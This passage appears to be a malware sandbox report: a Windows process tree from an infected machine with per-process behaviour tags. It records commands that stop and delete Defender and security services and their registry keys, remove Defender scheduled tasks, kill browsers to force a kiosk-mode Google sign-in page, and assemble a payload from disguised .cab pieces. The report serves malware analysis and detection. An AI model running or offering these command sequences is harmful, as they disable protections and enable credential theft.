                                                                                                                                                                                                        • Launches sc.exe
                                                                                                                                                                                                        PID:5476
                                                                                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                                                                                        sc delete "SecurityHealthService"
                                                                                                                                                                                                        11⤵
                                                                                                                                                                                                        • Launches sc.exe
                                                                                                                                                                                                        PID:2712
                                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                                        reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
                                                                                                                                                                                                        11⤵
                                                                                                                                                                                                          PID:2644
                                                                                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                                                                                          sc stop "webthreatdefsvc"
                                                                                                                                                                                                          11⤵
                                                                                                                                                                                                          • Launches sc.exe
                                                                                                                                                                                                          PID:1072
                                                                                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                                                                                          sc delete "webthreatdefsvc"
                                                                                                                                                                                                          11⤵
                                                                                                                                                                                                            PID:1740
                                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                                            reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
                                                                                                                                                                                                            11⤵
                                                                                                                                                                                                              PID:6112
                                                                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                                                                              sc stop "webthreatdefusersvc"
                                                                                                                                                                                                              11⤵
                                                                                                                                                                                                                PID:1340
                                                                                                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                sc delete "webthreatdefusersvc"
                                                                                                                                                                                                                11⤵
                                                                                                                                                                                                                • Launches sc.exe
                                                                                                                                                                                                                PID:3728
                                                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
                                                                                                                                                                                                                11⤵
                                                                                                                                                                                                                  PID:1640
                                                                                                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                  sc stop "WdNisDrv"
                                                                                                                                                                                                                  11⤵
                                                                                                                                                                                                                    PID:4536
                                                                                                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                    sc delete "WdNisDrv"
                                                                                                                                                                                                                    11⤵
                                                                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                                                                    PID:952
                                                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                    reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
                                                                                                                                                                                                                    11⤵
                                                                                                                                                                                                                      PID:3844
                                                                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                      sc stop "WdBoot"
                                                                                                                                                                                                                      11⤵
                                                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                                                      PID:2988
                                                                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                      sc delete "WdBoot"
                                                                                                                                                                                                                      11⤵
                                                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                                                      PID:4784
                                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                      reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
                                                                                                                                                                                                                      11⤵
                                                                                                                                                                                                                        PID:4508
                                                                                                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                        sc stop "WdFilter"
                                                                                                                                                                                                                        11⤵
                                                                                                                                                                                                                        • Launches sc.exe
                                                                                                                                                                                                                        PID:5972
                                                                                                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                        sc delete "WdFilter"
                                                                                                                                                                                                                        11⤵
                                                                                                                                                                                                                        • Launches sc.exe
                                                                                                                                                                                                                        PID:5804
                                                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                        reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
                                                                                                                                                                                                                        11⤵
                                                                                                                                                                                                                          PID:6120
                                                                                                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                          sc stop "SgrmAgent"
                                                                                                                                                                                                                          11⤵
                                                                                                                                                                                                                          • Launches sc.exe
                                                                                                                                                                                                                          PID:4012
                                                                                                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                          sc delete "SgrmAgent"
                                                                                                                                                                                                                          11⤵
                                                                                                                                                                                                                          • Launches sc.exe
                                                                                                                                                                                                                          PID:6032
                                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                          reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
                                                                                                                                                                                                                          11⤵
                                                                                                                                                                                                                            PID:3400
                                                                                                                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                            sc stop "MsSecWfp"
                                                                                                                                                                                                                            11⤵
                                                                                                                                                                                                                              PID:2544
                                                                                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                              sc delete "MsSecWfp"
                                                                                                                                                                                                                              11⤵
                                                                                                                                                                                                                              • Launches sc.exe
                                                                                                                                                                                                                              PID:3348
                                                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                              reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
                                                                                                                                                                                                                              11⤵
                                                                                                                                                                                                                                PID:2780
                                                                                                                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                                sc stop "MsSecFlt"
                                                                                                                                                                                                                                11⤵
                                                                                                                                                                                                                                • Launches sc.exe
                                                                                                                                                                                                                                PID:2236
                                                                                                                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                                sc delete "MsSecFlt"
                                                                                                                                                                                                                                11⤵
                                                                                                                                                                                                                                • Launches sc.exe
                                                                                                                                                                                                                                PID:5936
                                                                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
                                                                                                                                                                                                                                11⤵
                                                                                                                                                                                                                                  PID:4068
                                                                                                                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                                  sc stop "MsSecCore"
                                                                                                                                                                                                                                  11⤵
                                                                                                                                                                                                                                  • Launches sc.exe
                                                                                                                                                                                                                                  PID:1020
                                                                                                                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                                  sc delete "MsSecCore"
                                                                                                                                                                                                                                  11⤵
                                                                                                                                                                                                                                  • Launches sc.exe
                                                                                                                                                                                                                                  PID:2216
                                                                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                  reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
                                                                                                                                                                                                                                  11⤵
                                                                                                                                                                                                                                    PID:2816
                                                                                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                    schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
                                                                                                                                                                                                                                    11⤵
                                                                                                                                                                                                                                      PID:2744
                                                                                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                      schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
                                                                                                                                                                                                                                      11⤵
                                                                                                                                                                                                                                        PID:6080
                                                                                                                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
                                                                                                                                                                                                                                        11⤵
                                                                                                                                                                                                                                          PID:4632
                                                                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                          schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
                                                                                                                                                                                                                                          11⤵
                                                                                                                                                                                                                                            PID:4692
                                                                                                                                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                                            sc stop ddrver
                                                                                                                                                                                                                                            11⤵
                                                                                                                                                                                                                                            • Launches sc.exe
                                                                                                                                                                                                                                            PID:4252
                                                                                                                                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                                            sc delete ddrver
                                                                                                                                                                                                                                            11⤵
                                                                                                                                                                                                                                            • Launches sc.exe
                                                                                                                                                                                                                                            PID:1816
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\10413600101\5f5ec28421.exe
                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\10413600101\5f5ec28421.exe"
                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                  • Identifies Wine through registry keys
                                                                                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                  PID:5184
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\10413610101\e1404da1ac.exe
                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\10413610101\e1404da1ac.exe"
                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                  • Downloads MZ/PE file
                                                                                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                                                                                  • Checks computer location settings
                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                                                                                                  PID:3176
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\BFqoXnxo8VcT.exe
                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\BFqoXnxo8VcT.exe"
                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                    • Identifies Wine through registry keys
                                                                                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                    PID:5572
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\KhwsQCwNrkuf.exe
                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\KhwsQCwNrkuf.exe"
                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                    • Identifies Wine through registry keys
                                                                                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                    PID:5376
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\10413620101\ab7d67580c.exe
                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\10413620101\ab7d67580c.exe"
                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                  PID:5816
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                    taskkill /F /IM firefox.exe /T
                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                                                                                    PID:2004
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                    taskkill /F /IM chrome.exe /T
                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                                                                                    PID:264
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                    taskkill /F /IM msedge.exe /T
                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                                                                                    PID:5648
                                                                                                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                        PID:5572
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                      taskkill /F /IM opera.exe /T
                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                      PID:4736
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                      taskkill /F /IM brave.exe /T
                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                      PID:5928
                                                                                                                                                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                        PID:4312
                                                                                                                                                                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                          PID:1136
                                                                                                                                                                                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2004 -prefsLen 27099 -prefMapHandle 2008 -prefMapSize 270279 -ipcHandle 2088 -initialChannelId {ff489d31-49f6-41ff-97f1-2fe78edc132f} -parentPid 1136 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1136" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
                                                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                                                              PID:3612
                                                                                                                                                                                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2492 -prefsLen 27135 -prefMapHandle 2496 -prefMapSize 270279 -ipcHandle 2504 -initialChannelId {c70dcf87-006b-406a-b25a-dc32f0840739} -parentPid 1136 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1136" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
                                                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                                                                PID:4060
                                                                                                                                                                                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3812 -prefsLen 25164 -prefMapHandle 3816 -prefMapSize 270279 -jsInitHandle 3820 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3828 -initialChannelId {f3039846-e209-4f17-ab9c-3220f91e7148} -parentPid 1136 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1136" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
                                                                                                                                                                                                                                                9⤵
                                                                                                                                                                                                                                                • Checks processor information in registry
                                                                                                                                                                                                                                                PID:5716
                                                                                                                                                                                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 3980 -prefsLen 27276 -prefMapHandle 3984 -prefMapSize 270279 -ipcHandle 4080 -initialChannelId {22c8c563-2905-4f67-a0ba-8f4fa3636051} -parentPid 1136 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1136" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
                                                                                                                                                                                                                                                9⤵
                                                                                                                                                                                                                                                  PID:5720
                                                                                                                                                                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3280 -prefsLen 34775 -prefMapHandle 3284 -prefMapSize 270279 -jsInitHandle 3292 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4360 -initialChannelId {023b78fe-3a8c-47cb-8aa2-5f398c707869} -parentPid 1136 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1136" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
                                                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                                                                                                                  PID:1576
                                                                                                                                                                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 4920 -prefsLen 35012 -prefMapHandle 4924 -prefMapSize 270279 -ipcHandle 4928 -initialChannelId {8d9bd1cd-a305-4a98-8f3a-eb9e18529d60} -parentPid 1136 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1136" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
                                                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                                                                                                                  PID:6572
                                                                                                                                                                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5440 -prefsLen 32952 -prefMapHandle 5444 -prefMapSize 270279 -jsInitHandle 5448 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5396 -initialChannelId {d0e7680b-1274-4854-8066-f0af32b40dbd} -parentPid 1136 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1136" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
                                                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                                                                                                                  PID:1636
                                                                                                                                                                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5620 -prefsLen 32952 -prefMapHandle 5624 -prefMapSize 270279 -jsInitHandle 5628 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5636 -initialChannelId {e64909ad-103f-4350-a327-22f6bb59f846} -parentPid 1136 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1136" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
                                                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                                                                                                                  PID:5852
                                                                                                                                                                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5820 -prefsLen 32952 -prefMapHandle 5824 -prefMapSize 270279 -jsInitHandle 5828 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5652 -initialChannelId {e468bc7c-7b30-472f-a35b-8d94077fd67d} -parentPid 1136 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1136" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
                                                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                                                                                                                  PID:4364
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10413630101\8949df3bcc.exe
                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10413630101\8949df3bcc.exe"
                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                            • Modifies Windows Defender DisableAntiSpyware settings
                                                                                                                                                                                                                                            • Modifies Windows Defender Real-time Protection settings
                                                                                                                                                                                                                                            • Modifies Windows Defender TamperProtection settings
                                                                                                                                                                                                                                            • Modifies Windows Defender notification settings
                                                                                                                                                                                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                            • Identifies Wine through registry keys
                                                                                                                                                                                                                                            • Windows security modification
                                                                                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                            PID:6136
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10413640101\6ad68a4a2e.exe
                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10413640101\6ad68a4a2e.exe"
                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                            • Identifies Wine through registry keys
                                                                                                                                                                                                                                            • Writes to the Master Boot Record (MBR)
                                                                                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                            PID:6236
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10413650101\HAe88WC.exe
                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10413650101\HAe88WC.exe"
                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                            PID:3348
                                                                                                                                                                                                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                              PID:6472
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10413660101\h8NlU62.exe
                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10413660101\h8NlU62.exe"
                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                            PID:6116
                                                                                                                                                                                                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                              PID:4444
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10413670101\XOPPRUc.exe
                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10413670101\XOPPRUc.exe"
                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                            PID:6764
                                                                                                                                                                                                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                              PID:6784
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10413680101\7IIl2eE.exe
                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10413680101\7IIl2eE.exe"
                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                            • Checks computer location settings
                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                            PID:7528
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\CMD.exe
                                                                                                                                                                                                                                              "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                              PID:7644
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                                tasklist
                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                • Enumerates processes with tasklist
                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                PID:2732
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                findstr /I "opssvc wrsa"
                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                PID:6032
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                                tasklist
                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                • Enumerates processes with tasklist
                                                                                                                                                                                                                                                PID:5484
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                  PID:5280
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                  cmd /c md 418377
                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                    PID:7004
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                    extrac32 /Y /E Leon.cab
                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                      PID:5928
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                      findstr /V "BEVERAGES" Compilation
                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                        PID:7304
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                        cmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com
                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                          PID:7456
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                          cmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N
                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                            PID:7616
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\418377\Passwords.com
                                                                                                                                                                                                                                                            Passwords.com N
                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                              PID:7824
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\choice.exe
                                                                                                                                                                                                                                                              choice /d y /t 5
                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                                PID:8044
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10413690101\captcha.exe
                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10413690101\captcha.exe"
                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                            PID:4460
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10413700101\PQPYAYJJ.exe
                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10413700101\PQPYAYJJ.exe"
                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                            • Checks computer location settings
                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                            PID:7384
                                                                                                                                                                                                                                                            • C:\Users\Admin\Abspawnhlp.exe
                                                                                                                                                                                                                                                              "C:\Users\Admin\Abspawnhlp.exe"
                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                              PID:7536
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe
